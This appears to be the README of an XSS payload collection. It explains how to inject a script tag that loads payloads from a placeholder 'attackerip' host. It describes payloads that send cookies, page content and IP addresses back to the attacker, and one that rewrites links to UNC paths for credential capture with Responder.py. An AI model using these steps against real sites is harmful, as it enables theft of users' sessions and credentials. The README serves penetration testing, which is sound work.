Payloads for practical exploitation of cross site scripting.
## Usage
1. Find XSS vuln in your app
2. Get PoC exploit: alert(1) etc
3. Host these payloads somewhere
4. Use vuln to pull one of these payloads into the app `<script src="http://attackerip/file.js"></script>`
5. Profit
## js vs php files
Some of the files are plain JavaScript .js files, others are PHP scripts which serve JavaScript when rendered in order to do some more complex stuff. Make sure you have a PHP interpreter running on your web server of choice to get these to work `</obvious>`
## Common Problems
* You can't serve these over HTTP if your app is running on HTTPS. You'll need to serve them over HTTPS
* If you're running these over HTTPS for actual exploitation rather than a PoC, you'll need a proper trusted TLS cert (Let's Encrypt CA, for example) otherwise victim's browsers won't fetch the files at all. If it's for a PoC you can just temporarily trust your self signed cert.
* Hit F12 and view the debug console for any information about why a particular script might not work
Passes back information about where it was executed:
- page URL
- script URL
- user's IP address
- Page content
- Any non HttpOnly cookies present
- User agent string
And then logs it all into either a file or a database. Great for when a collaborator alert is generated asynchronously and you need more info about where execution is occuring.
Fire up Responder.py on the same host as this script and then inject this payload. All links on the injected page will be turned into UNC paths to the same host.